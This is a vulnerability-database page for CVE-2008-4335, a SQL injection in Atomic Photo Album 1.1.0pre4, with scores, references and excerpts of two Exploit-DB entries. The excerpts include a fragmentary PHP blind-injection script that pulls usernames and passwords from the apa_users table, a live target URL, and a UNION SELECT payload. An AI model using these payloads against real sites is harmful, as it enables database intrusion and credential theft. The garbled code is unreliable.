CVE-2008-4335
published 2008-09-30CVE-2008-4335: SQL injection vulnerability in album.php in Atomic Photo Album (APA) 1.1.0pre4 allows remote attackers to execute arbitrary SQL commands via the apa_album_ID…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
60.0th percentile
SQL injection vulnerability in album.php in Atomic Photo Album (APA) 1.1.0pre4 allows remote attackers to execute arbitrary SQL commands via the apa_album_ID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atomic_photo_album | atomic_photo_album | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Atomic Photo Album 1.1.0pre4 - Blind SQL Injection
exploitdb·2008-09-26
CVE-2008-4335 Atomic Photo Album 1.1.0pre4 - Blind SQL Injection
Atomic Photo Album 1.1.0pre4 - Blind SQL Injection
---
php '.$argv[0].' http://www.site.com/apa/album.php?apa_album_ID=2 2
# Live Demo :
# http://www.brzi.info/foto/album.php?apa_album_ID=2 1
#
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
if ($argc $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+nickname+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))
Exploit-DB
Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection
exploitdb·2008-09-25
CVE-2008-4336 Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection
Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection
---
[~]-----------------------------------------------------------------------
[~] Atomic Photo Album 1.1.0pre4 [album.php] - Multiple Remote Vulnerabilities
[~]
[~] http://atomicpa.sourceforge.net
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 25.09.2008
[~]
[~]
[~] [email protected]
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig AND milw0rm staff
[~]-------------------------------------------------------------
[~] Exploit :- SQL Injection
[~]
[~] http://site.com/album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),dat
No writeups or analysis indexed.
http://www.securityfocus.com/bid/31409http://www.vupen.com/english/advisories/2008/2691https://exchange.xforce.ibmcloud.com/vulnerabilities/45433https://www.exploit-db.com/exploits/6572https://www.exploit-db.com/exploits/6574http://www.securityfocus.com/bid/31409http://www.vupen.com/english/advisories/2008/2691https://exchange.xforce.ibmcloud.com/vulnerabilities/45433https://www.exploit-db.com/exploits/6572https://www.exploit-db.com/exploits/6574
2008-09-30
Published